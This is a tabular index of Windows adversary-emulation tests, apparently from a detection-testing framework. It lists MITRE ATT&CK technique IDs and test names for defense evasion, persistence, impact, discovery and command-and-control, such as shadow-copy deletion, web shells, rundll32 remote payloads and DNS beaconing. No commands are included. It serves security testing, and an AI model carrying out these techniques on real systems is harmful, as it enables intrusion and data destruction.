305 defense-evasion T1036.003 Rename System Utilities 9 File Extension Masquerading c7fa0c3b-b57f-4cba-9118-863bf4e653fc command_prompt
306 defense-evasion T1207 Rogue Domain Controller 1 DCShadow (Active Directory) 0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6 powershell
307 defense-evasion T1014 Rootkit 3 Windows Signed Driver Rootkit Test 8e4e1985-9a19-4529-b4b8-b7a49ff87fae command_prompt
308 defense-evasion T1218.011 Rundll32 1 Rundll32 execute JavaScript Remote Payload With GetObject cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be command_prompt
309 defense-evasion T1218.011 Rundll32 2 Rundll32 execute VBscript command 638730e7-7aed-43dc-bf8c-8117f805f5bb command_prompt
310 defense-evasion T1218.011 Rundll32 3 Rundll32 advpack.dll Execution d91cae26-7fc1-457b-a854-34c8aad48c89 command_prompt
311 defense-evasion T1218.011 Rundll32 4 Rundll32 ieadvpack.dll Execution 5e46a58e-cbf6-45ef-a289-ed7754603df9 command_prompt
312 defense-evasion T1218.011 Rundll32 5 Rundll32 syssetup.dll Execution 41fa324a-3946-401e-bbdd-d7991c628125 command_prompt
313 defense-evasion T1218.011 Rundll32 6 Rundll32 setupapi.dll Execution 71d771cd-d6b3-4f34-bc76-a63d47a10b19 command_prompt
314 defense-evasion T1218.011 Rundll32 7 Execution of HTA and VBS Files using Rundll32 and URL.dll 22cfde89-befe-4e15-9753-47306b37a6e3 command_prompt
315 defense-evasion T1218.011 Rundll32 8 Launches an executable using Rundll32 and pcwutl.dll 9f5d081a-ee5a-42f9-a04e-b7bdc487e676 command_prompt
316 defense-evasion T1574.011 Services Registry Permissions Weakness 1 Service Registry Permissions Weakness f7536d63-7fd4-466f-89da-7e48d550752a powershell
317 defense-evasion T1574.011 Services Registry Permissions Weakness 2 Service ImagePath Change with reg.exe f38e9eea-e1d7-4ba6-b716-584791963827 command_prompt
318 defense-evasion T1218 Signed Binary Proxy Execution 1 mavinject - Inject DLL into running process c426dacf-575d-4937-8611-a148a86a5e61 command_prompt
319 defense-evasion T1218 Signed Binary Proxy Execution 2 SyncAppvPublishingServer - Execute arbitrary PowerShell code d590097e-d402-44e2-ad72-2c6aa1ce78b1 command_prompt
320 defense-evasion T1218 Signed Binary Proxy Execution 3 Register-CimProvider - Execute evil dll ad2c17ed-f626-4061-b21e-b9804a6f3655 command_prompt
321 defense-evasion T1218 Signed Binary Proxy Execution 4 InfDefaultInstall.exe .inf Execution 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef command_prompt
322 defense-evasion T1218 Signed Binary Proxy Execution 5 ProtocolHandler.exe Downloaded a Suspicious File db020456-125b-4c8b-a4a7-487df8afb5a2 command_prompt
323 defense-evasion T1218 Signed Binary Proxy Execution 6 Microsoft.Workflow.Compiler.exe Payload Execution 7cbb0f26-a4c1-4f77-b180-a009aa05637e powershell
324 defense-evasion T1218 Signed Binary Proxy Execution 7 Renamed Microsoft.Workflow.Compiler.exe Payload Executions 4cc40fd7-87b8-4b16-b2d7-57534b86b911 powershell
325 defense-evasion T1218 Signed Binary Proxy Execution 8 Invoke-ATHRemoteFXvGPUDisablementCommand base test 9ebe7901-7edf-45c0-b5c7-8366300919db powershell
326 defense-evasion T1216 Signed Script Proxy Execution 1 SyncAppvPublishingServer Signed Script PowerShell Command Execution 275d963d-3f36-476c-8bef-a2a3960ee6eb command_prompt
327 defense-evasion T1216 Signed Script Proxy Execution 2 manage-bde.wsf Signed Script Command Execution 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a command_prompt
328 defense-evasion T1497.001 System Checks 2 Detect Virtualization Environment (Windows) 502a7dc4-9d6f-4d28-abf2-f0e84692562d powershell
329 defense-evasion T1221 Template Injection 1 WINWORD Remote Template Injection 1489e08a-82c7-44ee-b769-51b72d03521d command_prompt
330 defense-evasion T1070.006 Timestomp 5 Windows - Modify file creation timestamp with PowerShell b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c powershell
331 defense-evasion T1070.006 Timestomp 6 Windows - Modify file last modified timestamp with PowerShell f8f6634d-93e1-4238-8510-f8a90a20dcf2 powershell
332 defense-evasion T1070.006 Timestomp 7 Windows - Modify file last access timestamp with PowerShell da627f63-b9bd-4431-b6f8-c5b44d061a62 powershell
333 defense-evasion T1070.006 Timestomp 8 Windows - Timestomp a File d7512c33-3a75-4806-9893-69abc3ccdd43 powershell
334 defense-evasion T1134.001 Token Impersonation/Theft 1 Named pipe client impersonation 90db9e27-8e7c-4c04-b602-a45927884966 powershell
335 defense-evasion T1134.001 Token Impersonation/Theft 2 `SeDebugPrivilege` token duplication 34f0a430-9d04-4d98-bcb5-1989f14719f0 powershell
336 defense-evasion T1222.001 Windows File and Directory Permissions Modification 1 Take ownership using takeown utility 98d34bb4-6e75-42ad-9c41-1dae7dc6a001 command_prompt
337 defense-evasion T1222.001 Windows File and Directory Permissions Modification 2 cacls - Grant permission to specified user or group recursively a8206bcc-f282-40a9-a389-05d9c0263485 command_prompt
338 defense-evasion T1222.001 Windows File and Directory Permissions Modification 3 attrib - Remove read-only attribute bec1e95c-83aa-492e-ab77-60c71bbd21b0 command_prompt
339 defense-evasion T1222.001 Windows File and Directory Permissions Modification 4 attrib - hide file 32b979da-7b68-42c9-9a99-0e39900fc36c command_prompt
340 defense-evasion T1222.001 Windows File and Directory Permissions Modification 5 Grant Full Access to folder for Everyone - Ryuk Ransomware Style ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6 command_prompt
341 defense-evasion T1220 XSL Script Processing 1 MSXSL Bypass using local files ca23bfb2-023f-49c5-8802-e66997de462d command_prompt
342 defense-evasion T1220 XSL Script Processing 2 MSXSL Bypass using remote files a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985 command_prompt
343 defense-evasion T1220 XSL Script Processing 3 WMIC bypass using local XSL file 1b237334-3e21-4a0c-8178-b8c996124988 command_prompt
344 defense-evasion T1220 XSL Script Processing 4 WMIC bypass using remote XSL file 7f5be499-33be-4129-a560-66021f379b9b command_prompt
345 persistence T1546.008 Accessibility Features 1 Attaches Command Prompt as a Debugger to a List of Target Processes 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 powershell
346 persistence T1546.008 Accessibility Features 2 Replace binary of sticky keys 934e90cf-29ca-48b3-863c-411737ad44e3 command_prompt
347 persistence T1098 Account Manipulation 1 Admin Account Manipulate 5598f7cb-cf43-455e-883a-f6008c5d46af powershell
348 persistence T1098 Account Manipulation 2 Domain Account and Group Manipulate a55a22e9-a3d3-42ce-bd48-2653adb8f7a9 powershell
349 persistence T1546.010 AppInit DLLs 1 Install AppInit Shim a58d9386-3080-4242-ab5f-454c16503d18 command_prompt
350 persistence T1546.011 Application Shimming 1 Application Shim Installation 9ab27e22-ee62-4211-962b-d36d9a0e6a18 command_prompt
351 persistence T1546.011 Application Shimming 2 New shim database files created in the default shim database directory aefd6866-d753-431f-a7a4-215ca7e3f13d powershell
352 persistence T1546.011 Application Shimming 3 Registry key creation and/or modification events for SDB 9b6a06f9-ab5e-4e8d-8289-1df4289db02f powershell
353 persistence T1053.002 At (Windows) 1 At.exe Scheduled task 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 command_prompt
354 persistence T1197 BITS Jobs 1 Bitsadmin Download (cmd) 3c73d728-75fb-4180-a12f-6712864d7421 command_prompt
355 persistence T1197 BITS Jobs 2 Bitsadmin Download (PowerShell) f63b8bc4-07e5-4112-acba-56f646f3f0bc powershell
356 persistence T1197 BITS Jobs 3 Persist, Download, & Execute 62a06ec5-5754-47d2-bcfc-123d8314c6ae command_prompt
357 persistence T1197 BITS Jobs 4 Bits download using desktopimgdownldr.exe (cmd) afb5e09e-e385-4dee-9a94-6ee60979d114 command_prompt
358 persistence T1176 Browser Extensions 1 Chrome (Developer Mode) 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 manual
359 persistence T1176 Browser Extensions 2 Chrome (Chrome Web Store) 4c83940d-8ca5-4bb2-8100-f46dc914bc3f manual
360 persistence T1176 Browser Extensions 3 Firefox cb790029-17e6-4c43-b96f-002ce5f10938 manual
361 persistence T1176 Browser Extensions 4 Edge Chromium Addon - VPN 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 manual
362 persistence T1574.012 COR_PROFILER 1 User scope COR_PROFILER 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a powershell
363 persistence T1574.012 COR_PROFILER 2 System Scope COR_PROFILER f373b482-48c8-4ce4-85ed-d40c8b3f7310 powershell
364 persistence T1574.012 COR_PROFILER 3 Registry-free process scope COR_PROFILER 79d57242-bbef-41db-b301-9d01d9f6e817 powershell
365 persistence T1546.001 Change Default File Association 1 Change Default File Association 10a08978-2045-4d62-8c42-1957bbbea102 command_prompt
366 persistence T1574.001 DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
367 persistence T1574.002 DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
368 persistence T1078.001 Default Accounts 1 Enable Guest account with RDP capability and admin priviliges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
369 persistence T1136.002 Domain Account 1 Create a new Windows domain admin user fcec2963-9951-4173-9bfa-98d8b7834e62 command_prompt
370 persistence T1136.002 Domain Account 2 Create a new account similar to ANONYMOUS LOGON dc7726d2-8ccb-4cc6-af22-0d5afb53a548 command_prompt
371 persistence T1136.002 Domain Account 3 Create a new Domain Account using PowerShell 5a3497a4-1568-4663-b12a-d4a5ed70c7d7 powershell
372 persistence T1133 External Remote Services 1 Running Chrome VPN Extensions via the Registry 2 vpn extension 4c8db261-a58b-42a6-a866-0a294deedde4 powershell
373 persistence T1546.012 Image File Execution Options Injection 1 IFEO Add Debugger fdda2626-5234-4c90-b163-60849a24c0b8 command_prompt
374 persistence T1546.012 Image File Execution Options Injection 2 IFEO Global Flags 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 command_prompt
375 persistence T1136.001 Local Account 3 Create a new user in a command prompt 6657864e-0323-4206-9344-ac9cd7265a4f command_prompt
376 persistence T1136.001 Local Account 4 Create a new user in PowerShell bc8be0ac-475c-4fbf-9b1d-9fffd77afbde powershell
377 persistence T1136.001 Local Account 6 Create a new Windows admin user fda74566-a604-4581-a4cc-fbbe21d66559 command_prompt
378 persistence T1078.003 Local Accounts 1 Create local account with admin priviliges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
379 persistence T1037.001 Logon Script (Windows) 1 Logon Scripts d6042746-07d4-4c92-9ad8-e644c114a231 command_prompt
380 persistence T1546.007 Netsh Helper DLL 1 Netsh Helper DLL Registration 3244697d-5a3a-4dfc-941c-550f69f91a4d command_prompt
381 persistence T1137 Office Application Startup 1 Office Application Startup - Outlook as a C2 bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c command_prompt
382 persistence T1137.002 Office Test 1 Office Application Startup Test Persistence c3e35b58-fe1c-480b-b540-7600fb612563 command_prompt
383 persistence T1137.004 Outlook Home Page 1 Install Outlook Home Page Persistence 7a91ad51-e6d2-4d43-9471-f26362f5738e command_prompt
384 persistence T1556.002 Password Filter DLL 1 Install and Register Password Filter DLL a7961770-beb5-4134-9674-83d7e1fa865c powershell
385 persistence T1574.009 Path Interception by Unquoted Path 1 Execution of program.exe as service with unquoted service path 2770dea7-c50f-457b-84c4-c40a47460d9f command_prompt
386 persistence T1547.010 Port Monitors 1 Add Port Monitor persistence in Registry d34ef297-f178-4462-871e-9ce618d44e50 command_prompt
387 persistence T1546.013 PowerShell Profile 1 Append malicious start-process cmdlet 090e5aa5-32b6-473b-a49b-21e843a56896 powershell
388 persistence T1547.001 Registry Run Keys / Startup Folder 1 Reg Key Run e55be3fd-3521-4610-9d1a-e210e42dcf05 command_prompt
389 persistence T1547.001 Registry Run Keys / Startup Folder 2 Reg Key RunOnce 554cbd88-cde1-4b56-8168-0be552eed9eb command_prompt
390 persistence T1547.001 Registry Run Keys / Startup Folder 3 PowerShell Registry RunOnce eb44f842-0457-4ddc-9b92-c4caa144ac42 powershell
391 persistence T1547.001 Registry Run Keys / Startup Folder 4 Suspicious vbs file run from startup Folder 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 powershell
392 persistence T1547.001 Registry Run Keys / Startup Folder 5 Suspicious jse file run from startup Folder dade9447-791e-4c8f-b04b-3a35855dfa06 powershell
393 persistence T1547.001 Registry Run Keys / Startup Folder 6 Suspicious bat file run from startup Folder 5b6768e4-44d2-44f0-89da-a01d1430fd5e powershell
394 persistence T1547.001 Registry Run Keys / Startup Folder 7 Add Executable Shortcut Link to User Startup Folder 24e55612-85f6-4bd6-ae74-a73d02e3441d powershell
395 persistence T1053.005 Scheduled Task 1 Scheduled Task Startup Script fec27f65-db86-4c2d-b66c-61945aee87c2 command_prompt
396 persistence T1053.005 Scheduled Task 2 Scheduled task Local 42f53695-ad4a-4546-abb6-7d837f644a71 command_prompt
397 persistence T1053.005 Scheduled Task 3 Scheduled task Remote 2e5eac3e-327b-4a88-a0c0-c4057039a8dd command_prompt
398 persistence T1053.005 Scheduled Task 4 Powershell Cmdlet Scheduled Task af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd powershell
399 persistence T1053.005 Scheduled Task 5 Task Scheduler via VBA ecd3fa21-7792-41a2-8726-2c5c673414d3 powershell
400 persistence T1053.005 Scheduled Task 6 WMI Invoke-CimMethod Scheduled Task e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b powershell
401 persistence T1546.002 Screensaver 1 Set Arbitrary Binary as Screensaver 281201e7-de41-4dc9-b73d-f288938cbb64 command_prompt
402 persistence T1547.005 Security Support Provider 1 Modify SSP configuration in registry afdfd7e3-8a0b-409f-85f7-886fdf249c9e powershell
403 persistence T1574.011 Services Registry Permissions Weakness 1 Service Registry Permissions Weakness f7536d63-7fd4-466f-89da-7e48d550752a powershell
404 persistence T1574.011 Services Registry Permissions Weakness 2 Service ImagePath Change with reg.exe f38e9eea-e1d7-4ba6-b716-584791963827 command_prompt
405 persistence T1547.009 Shortcut Modification 1 Shortcut Modification ce4fc678-364f-4282-af16-2fb4c78005ce command_prompt
406 persistence T1547.009 Shortcut Modification 2 Create shortcut to cmd in startup folders cfdc954d-4bb0-4027-875b-a1893ce406f2 powershell
407 persistence T1505.002 Transport Agent 1 Install MS Exchange Transport Agent Persistence 43e92449-ff60-46e9-83a3-1a38089df94d powershell
408 persistence T1505.003 Web Shell 1 Web Shell Written to Disk 0a2ce662-1efa-496f-a472-2fe7b080db16 command_prompt
409 persistence T1546.003 Windows Management Instrumentation Event Subscription 1 Persistence via WMI Event Subscription 3c64f177-28e2-49eb-a799-d767b24dd1e0 powershell
410 persistence T1543.003 Windows Service 1 Modify Fax service to run PowerShell ed366cde-7d12-49df-a833-671904770b9f command_prompt
411 persistence T1543.003 Windows Service 2 Service Installation CMD 981e2942-e433-44e9-afc1-8c957a1496b6 command_prompt
412 persistence T1543.003 Windows Service 3 Service Installation PowerShell 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 powershell
413 persistence T1547.004 Winlogon Helper DLL 1 Winlogon Shell Key Persistence - PowerShell bf9f9d65-ee4d-4c3e-a843-777d04f19c38 powershell
414 persistence T1547.004 Winlogon Helper DLL 2 Winlogon Userinit Key Persistence - PowerShell fb32c935-ee2e-454b-8fa3-1c46b42e8dfb powershell
415 persistence T1547.004 Winlogon Helper DLL 3 Winlogon Notify Key Logon Persistence - PowerShell d40da266-e073-4e5a-bb8b-2b385023e5f9 powershell
416 impact T1531 Account Access Removal 1 Change User Password - Windows 1b99ef28-f83c-4ec5-8a08-1a56263a5bb2 command_prompt
417 impact T1531 Account Access Removal 2 Delete User - Windows f21a1d7d-a62f-442a-8c3a-2440d43b19e5 command_prompt
418 impact T1531 Account Access Removal 3 Remove Account From Domain Admin Group 43f71395-6c37-498e-ab17-897d814a0947 powershell
419 impact T1485 Data Destruction 1 Windows - Overwrite file with Sysinternals SDelete 476419b5-aebf-4366-a131-ae3e8dae5fc2 powershell
420 impact T1486 Data Encrypted for Impact 5 PureLocker Ransom Note 649349c7-9abf-493b-a7a2-b1aa4d141528 command_prompt
421 impact T1490 Inhibit System Recovery 1 Windows - Delete Volume Shadow Copies 43819286-91a9-4369-90ed-d31fb4da2c01 command_prompt
422 impact T1490 Inhibit System Recovery 2 Windows - Delete Volume Shadow Copies via WMI 6a3ff8dd-f49c-4272-a658-11c2fe58bd88 command_prompt
423 impact T1490 Inhibit System Recovery 3 Windows - wbadmin Delete Windows Backup Catalog 263ba6cb-ea2b-41c9-9d4e-b652dadd002c command_prompt
424 impact T1490 Inhibit System Recovery 4 Windows - Disable Windows Recovery Console Repair cf21060a-80b3-4238-a595-22525de4ab81 command_prompt
425 impact T1490 Inhibit System Recovery 5 Windows - Delete Volume Shadow Copies via WMI with PowerShell 39a295ca-7059-4a88-86f6-09556c1211e7 powershell
426 impact T1490 Inhibit System Recovery 6 Windows - Delete Backup Files 6b1dbaf6-cc8a-4ea6-891f-6058569653bf command_prompt
427 impact T1490 Inhibit System Recovery 7 Windows - wbadmin Delete systemstatebackup 584331dd-75bc-4c02-9e0b-17f5fd81c748 command_prompt
428 impact T1491.001 Internal Defacement 1 Replace Desktop Wallpaper 30558d53-9d76-41c4-9267-a7bd5184bed3 powershell
429 impact T1489 Service Stop 1 Windows - Stop service using Service Controller 21dfb440-830d-4c86-a3e5-2a491d5a8d04 command_prompt
430 impact T1489 Service Stop 2 Windows - Stop service using net.exe 41274289-ec9c-4213-bea4-e43c4aa57954 command_prompt
431 impact T1489 Service Stop 3 Windows - Stop service by killing process f3191b84-c38b-400b-867e-3a217a27795f command_prompt
432 impact T1529 System Shutdown/Reboot 1 Shutdown System - Windows ad254fa8-45c0-403b-8c77-e00b3d3e7a64 command_prompt
433 impact T1529 System Shutdown/Reboot 2 Restart System - Windows f4648f0d-bf78-483c-bafc-3ec99cd1c302 command_prompt
434 discovery T1010 Application Window Discovery 1 List Process Main Windows - C# .NET fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4 command_prompt
435 discovery T1217 Browser Bookmark Discovery 4 List Google Chrome Bookmarks on Windows with powershell faab755e-4299-48ec-8202-fc7885eb6545 powershell
436 discovery T1217 Browser Bookmark Discovery 5 List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt 76f71e2f-480e-4bed-b61e-398fe17499d5 command_prompt
437 discovery T1217 Browser Bookmark Discovery 6 List Mozilla Firefox bookmarks on Windows with command prompt 4312cdbc-79fc-4a9c-becc-53d49c734bc5 command_prompt
438 discovery T1217 Browser Bookmark Discovery 7 List Internet Explorer Bookmarks using the command prompt 727dbcdb-e495-4ab1-a6c4-80c7f77aef85 command_prompt
439 discovery T1087.002 Domain Account 1 Enumerate all accounts (Domain) 6fbc9e68-5ad7-444a-bd11-8bf3136c477e command_prompt
440 discovery T1087.002 Domain Account 2 Enumerate all accounts via PowerShell (Domain) 8b8a6449-be98-4f42-afd2-dedddc7453b2 powershell
441 discovery T1087.002 Domain Account 3 Enumerate logged on users via CMD (Domain) 161dcd85-d014-4f5e-900c-d3eaae82a0f7 command_prompt
442 discovery T1087.002 Domain Account 4 Automated AD Recon (ADRecon) 95018438-454a-468c-a0fa-59c800149b59 powershell
443 discovery T1087.002 Domain Account 5 Adfind -Listing password policy 736b4f53-f400-4c22-855d-1a6b5a551600 command_prompt
444 discovery T1087.002 Domain Account 6 Adfind - Enumerate Active Directory Admins b95fd967-4e62-4109-b48d-265edfd28c3a command_prompt
445 discovery T1087.002 Domain Account 7 Adfind - Enumerate Active Directory User Objects e1ec8d20-509a-4b9a-b820-06c9b2da8eb7 command_prompt
446 discovery T1087.002 Domain Account 8 Adfind - Enumerate Active Directory Exchange AD Objects 5e2938fb-f919-47b6-8b29-2f6a1f718e99 command_prompt
447 discovery T1087.002 Domain Account 9 Enumerate Default Domain Admin Details (Domain) c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef command_prompt
448 discovery T1087.002 Domain Account 10 Enumerate Active Directory for Unconstrained Delegation 46f8dbe9-22a5-4770-8513-66119c5be63b powershell
449 discovery T1069.002 Domain Groups 1 Basic Permission Groups Discovery Windows (Domain) dd66d77d-8998-48c0-8024-df263dc2ce5d command_prompt
450 discovery T1069.002 Domain Groups 2 Permission Groups Discovery PowerShell (Domain) 6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7 powershell
451 discovery T1069.002 Domain Groups 3 Elevated group enumeration using net group (Domain) 0afb5163-8181-432e-9405-4322710c0c37 command_prompt
452 discovery T1069.002 Domain Groups 4 Find machines where user has local admin access (PowerView) a2d71eee-a353-4232-9f86-54f4288dd8c1 powershell
453 discovery T1069.002 Domain Groups 5 Find local admins on all machines in domain (PowerView) a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd powershell
454 discovery T1069.002 Domain Groups 6 Find Local Admins via Group Policy (PowerView) 64fdb43b-5259-467a-b000-1b02c00e510a powershell
455 discovery T1069.002 Domain Groups 7 Enumerate Users Not Requiring Pre Auth (ASRepRoast) 870ba71e-6858-4f6d-895c-bb6237f6121b powershell
456 discovery T1069.002 Domain Groups 8 Adfind - Query Active Directory Groups 48ddc687-82af-40b7-8472-ff1e742e8274 command_prompt
457 discovery T1482 Domain Trust Discovery 1 Windows - Discover domain trusts with dsquery 4700a710-c821-4e17-a3ec-9e4c81d6845f command_prompt
458 discovery T1482 Domain Trust Discovery 2 Windows - Discover domain trusts with nltest 2e22641d-0498-48d2-b9ff-c71e496ccdbe command_prompt
459 discovery T1482 Domain Trust Discovery 3 Powershell enumerate domains and forests c58fbc62-8a62-489e-8f2d-3565d7d96f30 powershell
460 discovery T1482 Domain Trust Discovery 4 Adfind - Enumerate Active Directory OUs d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec command_prompt
461 discovery T1482 Domain Trust Discovery 5 Adfind - Enumerate Active Directory Trusts 15fe436d-e771-4ff3-b655-2dca9ba52834 command_prompt
462 discovery T1083 File and Directory Discovery 1 File and Directory Discovery (cmd.exe) 0e36303b-6762-4500-b003-127743b80ba6 command_prompt
463 discovery T1083 File and Directory Discovery 2 File and Directory Discovery (PowerShell) 2158908e-b7ef-4c21-8a83-3ce4dd05a924 powershell
464 discovery T1087.001 Local Account 8 Enumerate all accounts on Windows (Local) 80887bec-5a9b-4efc-a81d-f83eb2eb32ab command_prompt
465 discovery T1087.001 Local Account 9 Enumerate all accounts via PowerShell (Local) ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b powershell
466 discovery T1087.001 Local Account 10 Enumerate logged on users via CMD (Local) a138085e-bfe5-46ba-a242-74a6fb884af3 command_prompt
467 discovery T1087.001 Local Account 11 Enumerate logged on users via PowerShell 2bdc42c7-8907-40c2-9c2b-42919a00fe03 powershell
468 discovery T1069.001 Local Groups 2 Basic Permission Groups Discovery Windows (Local) 1f454dd6-e134-44df-bebb-67de70fb6cd8 command_prompt
469 discovery T1069.001 Local Groups 3 Permission Groups Discovery PowerShell (Local) a580462d-2c19-4bc7-8b9a-57a41b7d3ba4 powershell
470 discovery T1046 Network Service Scanning 3 Port Scan NMap for Windows d696a3cb-d7a8-4976-8eb5-5af4abf2e3df powershell
471 discovery T1046 Network Service Scanning 4 Port Scan using python 6ca45b04-9f15-4424-b9d3-84a217285a5c powershell
472 discovery T1135 Network Share Discovery 3 Network Share Discovery command prompt 20f1097d-81c1-405c-8380-32174d493bbb command_prompt
473 discovery T1135 Network Share Discovery 4 Network Share Discovery PowerShell 1b0814d1-bb24-402d-9615-1b20c50733fb powershell
474 discovery T1135 Network Share Discovery 5 View available share drives ab39a04f-0c93-4540-9ff2-83f862c385ae command_prompt
475 discovery T1135 Network Share Discovery 6 Share Discovery with PowerView b1636f0a-ba82-435c-b699-0d78794d8bfd powershell
476 discovery T1040 Network Sniffing 3 Packet Capture Windows Command Prompt a5b2f6a0-24b4-493e-9590-c699f75723ca command_prompt
477 discovery T1040 Network Sniffing 4 Windows Internal Packet Capture b5656f67-d67f-4de8-8e62-b5581630f528 command_prompt
478 discovery T1201 Password Policy Discovery 5 Examine local password policy - Windows 4588d243-f24e-4549-b2e3-e627acc089f6 command_prompt
479 discovery T1201 Password Policy Discovery 6 Examine domain password policy - Windows 46c2c362-2679-4ef5-aec9-0e958e135be4 command_prompt
480 discovery T1120 Peripheral Device Discovery 1 Win32_PnPEntity Hardware Inventory 2cb4dbf2-2dca-4597-8678-4d39d207a3a5 powershell
481 discovery T1057 Process Discovery 2 Process Discovery - tasklist c5806a4f-62b8-4900-980b-c7ec004e9908 command_prompt
482 discovery T1012 Query Registry 1 Query Registry 8f7578c4-9863-4d83-875c-a565573bbdf0 command_prompt
483 discovery T1018 Remote System Discovery 1 Remote System Discovery - net 85321a9c-897f-4a60-9f20-29788e50bccd command_prompt
484 discovery T1018 Remote System Discovery 2 Remote System Discovery - net group Domain Computers f1bf6c8f-9016-4edf-aff9-80b65f5d711f command_prompt
485 discovery T1018 Remote System Discovery 3 Remote System Discovery - nltest 52ab5108-3f6f-42fb-8ba3-73bc054f22c8 command_prompt
486 discovery T1018 Remote System Discovery 4 Remote System Discovery - ping sweep 6db1f57f-d1d5-4223-8a66-55c9c65a9592 command_prompt
487 discovery T1018 Remote System Discovery 5 Remote System Discovery - arp 2d5a61f5-0447-4be4-944a-1f8530ed6574 command_prompt
488 discovery T1018 Remote System Discovery 8 Remote System Discovery - nslookup baa01aaa-5e13-45ec-8a0d-e46c93c9760f powershell
489 discovery T1018 Remote System Discovery 9 Remote System Discovery - adidnsdump 95e19466-469e-4316-86d2-1dc401b5a959 command_prompt
490 discovery T1018 Remote System Discovery 10 Adfind - Enumerate Active Directory Computer Objects a889f5be-2d54-4050-bd05-884578748bb4 command_prompt
491 discovery T1018 Remote System Discovery 11 Adfind - Enumerate Active Directory Domain Controller Objects 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e command_prompt
492 discovery T1518.001 Security Software Discovery 1 Security Software Discovery f92a380f-ced9-491f-b338-95a991418ce2 command_prompt
493 discovery T1518.001 Security Software Discovery 2 Security Software Discovery - powershell 7f566051-f033-49fb-89de-b6bacab730f0 powershell
494 discovery T1518.001 Security Software Discovery 5 Security Software Discovery - Sysmon Service fe613cf3-8009-4446-9a0f-bc78a15b66c9 command_prompt
495 discovery T1518.001 Security Software Discovery 6 Security Software Discovery - AV Discovery via WMI 1553252f-14ea-4d3b-8a08-d7a4211aa945 command_prompt
496 discovery T1518 Software Discovery 1 Find and Display Internet Explorer Browser Version 68981660-6670-47ee-a5fa-7e74806420a4 command_prompt
497 discovery T1518 Software Discovery 2 Applications Installed c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b powershell
498 discovery T1497.001 System Checks 2 Detect Virtualization Environment (Windows) 502a7dc4-9d6f-4d28-abf2-f0e84692562d powershell
499 discovery T1082 System Information Discovery 1 System Information Discovery 66703791-c902-4560-8770-42b8a91f7667 command_prompt
500 discovery T1082 System Information Discovery 6 Hostname Discovery (Windows) 85cfbf23-4a1e-4342-8792-007e004b975f command_prompt
501 discovery T1082 System Information Discovery 8 Windows MachineGUID Discovery 224b4daf-db44-404e-b6b2-f4d1f0126ef8 command_prompt
502 discovery T1082 System Information Discovery 9 Griffon Recon 69bd4abe-8759-49a6-8d21-0f15822d6370 powershell
503 discovery T1082 System Information Discovery 10 Environment variables discovery on windows f400d1c0-1804-4ff8-b069-ef5ddd2adbf3 command_prompt
504 discovery T1016 System Network Configuration Discovery 1 System Network Configuration Discovery on Windows 970ab6a1-0157-4f3f-9a73-ec4166754b23 command_prompt
505 discovery T1016 System Network Configuration Discovery 2 List Windows Firewall Rules 038263cb-00f4-4b0a-98ae-0696c67e1752 command_prompt
506 discovery T1016 System Network Configuration Discovery 4 System Network Configuration Discovery (TrickBot Style) dafaf052-5508-402d-bf77-51e0700c02e2 command_prompt
507 discovery T1016 System Network Configuration Discovery 5 List Open Egress Ports 4b467538-f102-491d-ace7-ed487b853bf5 powershell
508 discovery T1016 System Network Configuration Discovery 6 Adfind - Enumerate Active Directory Subnet Objects 9bb45dd7-c466-4f93-83a1-be30e56033ee command_prompt
509 discovery T1016 System Network Configuration Discovery 7 Qakbot Recon 121de5c6-5818-4868-b8a7-8fd07c455c1b command_prompt
510 discovery T1049 System Network Connections Discovery 1 System Network Connections Discovery 0940a971-809a-48f1-9c4d-b1d785e96ee5 command_prompt
511 discovery T1049 System Network Connections Discovery 2 System Network Connections Discovery with PowerShell f069f0f1-baad-4831-aa2b-eddac4baac4a powershell
512 discovery T1049 System Network Connections Discovery 4 System Discovery using SharpView 96f974bb-a0da-4d87-a744-ff33e73367e9 powershell
513 discovery T1033 System Owner/User Discovery 1 System Owner/User Discovery 4c4959bf-addf-4b4a-be86-8d09cc1857aa command_prompt
514 discovery T1033 System Owner/User Discovery 3 Find computers where user has session - Stealth mode (PowerView) 29857f27-a36f-4f7e-8084-4557cd6207ca powershell
515 discovery T1007 System Service Discovery 1 System Service Discovery 89676ba1-b1f8-47ee-b940-2e1a113ebc71 command_prompt
516 discovery T1007 System Service Discovery 2 System Service Discovery - net.exe 5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3 command_prompt
517 discovery T1124 System Time Discovery 1 System Time Discovery 20aba24b-e61f-4b26-b4ce-4784f763ca20 command_prompt
518 discovery T1124 System Time Discovery 2 System Time Discovery - PowerShell 1d5711d6-655c-4a47-ae9c-6503c74fa877 powershell
519 command-and-control T1071.004 DNS 1 DNS Large Query Volume 1700f5d6-5a44-487b-84de-bc66f507b0a6 powershell
520 command-and-control T1071.004 DNS 2 DNS Regular Beaconing 3efc144e-1af8-46bb-8ca2-1376bb6db8b6 powershell
